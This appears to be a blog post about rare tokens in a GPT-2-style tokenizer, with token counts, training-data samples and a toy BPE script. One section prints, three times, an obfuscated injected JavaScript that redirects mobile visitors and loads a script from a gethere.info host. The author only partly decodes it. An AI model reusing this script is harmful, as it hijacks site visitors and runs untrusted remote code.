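    "U": "Unloaded",
    "L": "Loaded",
    "C": "Constructed",
    "H": "Pre-initialized",
    "I": "Initialized",
    "J": "Post-initialized",
    "A": "Available",
    "D": "Disabled",
    "E": "Errored",
}

def expand_states(code):
    """Translate a state string such as 'UCHIJAAAA' into state names (hypothetical helper)."""
    # Unknown letters map to "?" so unexpected input does not raise.
    return [FORGE_STATES.get(ch, "?") for ch in code]

states = expand_states("UCHIJAAAA")
print(states)
```

Every mod line in the sample carries the same nine letters, which would plausibly explain how " UCHIJ" got merged into a single token despite appearing in so few files.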

 

47182 :""},{ 21
23785 "]=> 32
32047  "$:/ 3

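Fragments of code and serialized data. Going by the examples below, "]=> looks like PHP var_dump output, "$:/ looks like TiddlyWiki system paths, and :""},{ comes from JSON with empty string values.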

{ ["scope"]=> string(7) "website" ["viewed_count"]=> string(1) "5"
 "$:/core/images/chevron-right", "tags": "$:/tags/Image"
playerId","value":54674,"displayValue":"54674"},{"name":"retiredDescription","value":0,"displayValue":""},{"name

21807 \\\\\\\\ 45

Long sequences of the above are common on bitcoinmagazine.com. There is also ASCII art.

\\\\\\\\

\\\\\\\\\\\\\\\'s time for some investigation. The results are somewhat counter-intuitive. That makes the wh", "y looked at on a day to day basis.Value changes are measured as relative or percentage changes. That\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s because only relative changes are comparable between different assets and over time. To gi", "ty tells us how much the BTC vs USD exchange rate disperses around the mean over a given period. Let\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s look at some more historical data to put the Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. Ho", "he Bitcoin volatility into perspective.Thinking of historical Bitcoin volatility, it\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s no big news that it was going through the roof. However, what does deserve attention is ho", 'ing 2013. Absolute changes in that time were massive. But looking at relative figures tells us, that\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'s not the whole story

 'Text strings [ edit ]\n\n\\ Rossetta Code Write language name in 3D ASCII\n\n\\ Simple Method\n\n\n\n: l1 ." /\\\\\\\\\\\\\\\\\\\\\\\\\\ /\\\\\\\\ /\\\\\\\\\\\\\\ /\\\\\\\\\\\\\\\\\\\\\\\\\\ /\\\\\\ /\\\\\\" CR ;\n\n: l2 ." \\/\\\\\\///////// /\\\\\\//\\\\\\ /\\\\\\/////\\\\\\ \\//////\\\\\\//// \\/\\\\\\ \\/\\\\\\" CR ', '\\//// \\/\\\\\\ \\/\\\\\\" CR ;\n\n: l3 ." \\/\\\\\\ /\\\\\\/ \\///\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\ \\/\\\\\\" CR ;\n\n: l4 ." \\/\\\\\\\\\\\\\\\\\\ /\\\\\\ \\//\\\\\\ \\/\\\\\\\\\\\\\\\\\\/ \\/\\\\\\ \\/\\\\\\\\\\\\\\\\\\\\\\\\\\" CR ;\n\n: l5 ." \\/\\\\\\///// \\/\\\\\\ \\/\\\\\\ \\/\\\\\\////\\\\\\ \\/\\\\\\ \\/\\\\\\///////\\\\\\" CR ;\n\n: l6 ." \\/\\\\\\ ', '\n\n\n\n: "FORTH" cr L1 L2 L3 L4 L5 L6 L7 L8 l9 ;\n\n\n\n( test at the console )\n\npage "forth"\n\n\n\nOutput:\n\nnstant binary returns boolean\n\nreturn \\ isTrue ( )\n\n\n\nOutput:\n\nn\nTranslation of: Python\n\nimport strutils\n\n\n\nconst nim = """\n\n# # ##### # #\n\n#', 't)\n\n(maplist \'((X) (transform X "/" "\\\\")) (cdr Lst)) )\n\n\n\n(bye)\n\nOutput:\n\nn\nIf OpenConsole ( )\n\nPrintN ( " ////\\ ////\\ ////| " )\n\nPrintN ( " //// \\ __ //// \\ __ |XX', 'e:\n\nprocedure\n\nreturn 1 == 1\n\n\n\nisFalse:\n\nprocedure\n\nreturn \\ isTrue ( )\n\nOutput:\n\nn\nsimpler, shorter [ edit ]\n\nThis is a version of the above REXX program', "/*j*/ /*stick a fork in it, we're all done. */\n\noutput when using the default input:\n\n

 

 

17629  practition 13

I took that to be a personal challenge! I did a more comprehensive writeup here.

That's " practition" with a space. It is not used when tokenizing " practitioner" or " practitioners", since those have their own tokens. The examples in the dataset were misspellings, line breaks, and rare variants like "practitioning".

17629 ' practition' 13
32110 ' practitioner' 9942
24068 ' practitioners' 14646

My go-to answer for such situations is that the tokenizer behavior was bugged or changed during training. But that doesn't work here, since we see the exact same pattern for the GPT4o tokenizer!

31271 ' practition' 
55472 ' practitioner' 
43195 ' practitioners' 

This one took me days to work out, but the results were illuminating.

It started when I found a similar pattern with a lot of low-frequency tokens that seem like parts of common words.

token examples

 

4690 'ortunately' 14
6668 'fortunately' 4329
39955 ' fortunately' 10768
31276 'Fortunately' 15667
 
7105 ' volunte' 34
41434 ' volunteering' 10598
32730 ' volunteered' 14176
13904 ' volunteer' 20037
11661 ' volunteers' 20284

6598 ' behavi' 65
46571 'behavior' 7295
41672 ' behavioural' 7724
38975 ' behaviours' 9416
37722 ' behaving' 12645
17211 ' behavioral' 16533
14301 ' behaviors' 18709
9172 ' behaviour' 20497
4069 ' behavior' 20609

 

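Others on LessWrong suggested that BPE (byte-pair encoding), the process used to make the tokens in the first place, was responsible for this. BPE grows tokens by repeatedly merging the most frequent adjacent pair, so a fragment like " practition" has to enter the vocabulary before " practitioner" can be built from it; once the longer token exists, the fragment is rarely needed on its own.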

So it looks like ultra low-frequency tokens were culled, but the threshold was high enough that some survivors exhibit glitch behavior. This obviously solves itself with more data, so I would be extremely surprised if " practition" has glitch behavior in GPT4/GPT4o.
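The BPE explanation can be illustrated with a toy trainer. This is a minimal Python sketch, not GPT2's actual tokenizer: the real one is byte-level, uses a pre-tokenization regex, and performs about 50k merges. The word frequencies are made up, and `train_bpe` and `token_usage` are hypothetical helper names.

```python
from collections import Counter

def train_bpe(word_freqs, num_merges):
    """Toy BPE trainer: repeatedly merge the most frequent adjacent symbol pair."""
    # Every word starts out as a tuple of single characters.
    corpus = {tuple(word): freq for word, freq in word_freqs.items()}
    merges = []
    for _ in range(num_merges):
        pairs = Counter()
        for symbols, freq in corpus.items():
            for pair in zip(symbols, symbols[1:]):
                pairs[pair] += freq
        if not pairs:
            break
        # Highest count wins; ties are broken by the pair itself so runs are repeatable.
        best = max(pairs, key=lambda p: (pairs[p], p))
        merges.append(best[0] + best[1])
        merged_corpus = {}
        for symbols, freq in corpus.items():
            out, i = [], 0
            while i < len(symbols):
                if i + 1 < len(symbols) and (symbols[i], symbols[i + 1]) == best:
                    out.append(symbols[i] + symbols[i + 1])
                    i += 2
                else:
                    out.append(symbols[i])
                    i += 1
            key = tuple(out)
            merged_corpus[key] = merged_corpus.get(key, 0) + freq
        corpus = merged_corpus
    return merges, corpus

def token_usage(corpus):
    """Count how often each token is emitted when encoding the toy corpus."""
    usage = Counter()
    for symbols, freq in corpus.items():
        for symbol in symbols:
            usage[symbol] += freq
    return usage

# Made-up frequencies: two common words plus one rare variant.
word_freqs = {"practitioner": 100, "practitioners": 150, "practitioning": 1}
merges, corpus = train_bpe(word_freqs, num_merges=11)
usage = token_usage(corpus)
for token in ("practition", "practitioner", "practitioners"):
    print(token, usage[token])
```

With these toy numbers the counts come out as 1, 100 and 150. "practition" has to be created as a stepping stone, but once the longer merges exist it is only emitted for the rare variant. That is the same shape as the frequency tables above.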

 

 

41441 \\- 645

Code element for... something.

Unknown Code

\n\nvar _0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 
|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var 
_0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 
|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var 
_0x446d=[“\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x63\\x6F\\x6F\\x6B\\x69\\x65″,”\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74″,”\\x76\\x65\\x6E\\x64\\x6F\\x72″,”\\x6F\\x70\\x65\\x72\\x61″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26″,”\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74″,”\\x74\\x65\\x73\\x74″,”\\x73\\x75\\x62\\x73\\x74\\x72″,”\\x67\\x65\\x74\\x54\\x69\\x6D\\x65″,”\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D”,”\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt 
|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var 
_0xd052=[“\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74″,”\\x73\\x72\\x63″,”\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x33\\x63\\x58\\x66\\x71\\x6B\\x26\\x73\\x65\\x5F\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72\\x3D”,”\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72″,”\\x26\\x64\\x65\\x66\\x61\\x75\\x6C\\x74\\x5F\\x6B\\x65\\x79\\x77\\x6F\\x72\\x64\\x3D”,”\\x74\\x69\\x74\\x6C\\x65″,”\\x26″,”\\x3F”,”\\x72\\x65\\x70\\x6C\\x61\\x63\\x65″,”\\x73\\x65\\x61\\x72\\x63\\x68″,”\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E”,”\\x26\\x66\\x72\\x6D\\x3D\\x73\\x63\\x72\\x69\\x70\\x74″,”\\x63\\x75\\x72\\x72\\x65\\x6E\\x74\\x53\\x63\\x72\\x69\\x70\\x74″,”\\x69\\x6E\\x73\\x65\\x72\\x74\\x42\\x65\\x66\\x6F\\x72\\x65″,”\\x70\\x61\\x72\\x65\\x6E\\x74\\x4E\\x6F\\x64\\x65″,”\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64″,”\\x68\\x65\\x61\\x64″,”\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x42\\x79\\x54\\x61\\x67\\x4E\\x61\\x6D\\x65″,”\\x70\\x72\\x6F\\x74\\x6F\\x63\\x6F\\x6C”,”\\x68\\x74\\x74\\x70\\x73\\x3A”,”\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66″,”\\x52\\x5F\\x50\\x41\\x54\\x48″,”\\x54\\x68\\x65\\x20\\x77\\x65\\x62\\x73\\x69\\x74\\x65\\x20\\x77\\x6F\\x72\\x6B\\x73\\x20\\x6F\\x6E\\x20\\x48\\x54\\x54\\x50\\x53\\x2E\\x20\\x54\\x68\\x65\\x20\\x74\\x72\\x61\\x63\\x6B\\x65\\x72\\x20\\x6D\\x75\\x73\\x74\\x20\\x75\\x73\\x65\\x20\\x48\\x54\\x54\\x50\\x53\\x20\\x74\\x6F\\x6F\\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& 
KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}
 

This exact code was present in many different articles, often appearing in the middle of text. I don't know where to begin. Maybe it's something related to mobile devices?
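One way to get a foothold: the array at the top of the script is ordinary text written as \xNN hex escapes, which can be decoded mechanically. Here is a minimal Python sketch. The helper name `decode_hex_escapes` is made up for illustration, and the inputs are copied from the sample above with the dump's doubled backslashes collapsed to single ones.

```python
import re

def decode_hex_escapes(text):
    """Replace each \\xNN escape with the character it encodes (hypothetical helper)."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)

# A few entries of the _0x446d array from the sample above.
samples = [
    r"\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E",
    r"\x63\x6F\x6F\x6B\x69\x65",
    r"\x75\x73\x65\x72\x41\x67\x65\x6E\x74",
    r"\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74",
    r"\x6C\x6F\x63\x61\x74\x69\x6F\x6E",
]
decoded = [decode_hex_escapes(s) for s in samples]
for name in decoded:
    print(name)  # _mauthtoken, cookie, userAgent, googlebot, location
```

The decoded names are consistent with the mobile-device guess, as is the long list of phone model prefixes in the regular expression. The script appears to check a cookie and the visitor's user agent, then assign to window.location. This reading is tentative, since the script was only decoded, not executed. The "\-" token itself would come from the escaped hyphens inside that regular expression (for example "s\-" and "cdm\-").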

 

31666 ?????-?????- 0

Zero appearances. The shorter "?????-" appeared 3 times, each time inside an embedded tweet whose text had been replaced by question marks. That points to a Twitter embedding error, or possibly some other encoding issue.
The actual tweets were in Hindi.

I still have no idea what is going on here. Any help will be appreciated.

?????-

 chief Lalu Prasad Yadav has lashed out at Prime Minister Narendra Modi. Lalu termed PM\'s decision of demonetisation in the country as his "arrogant decision".\n\nLalu said that the problems of poverty, hunger, unemployment, and inflation India is facing is because of the BJP government at the Centre and its decision to go on the demonetisation drive.\n\n"Notebandi kar ke kendra ne desh mein daridrata, bhookhmari , berozgaari aur mehngai la di hai," Lalu tweeted.\n\n??????? ?? ?????? ?? ??? ??? ????????, ??????, ??????????, ?????? ?? ?? ??? ???????????? ?? ?? ??????? ?????? ?? ????? ??? ?????-??? ??????? - Lalu Prasad Yadav (@laluprasadrjd) October 20, 2017\n\nLalu said that it will take several years for India to come out of the damages caused due to PM Modi\'s 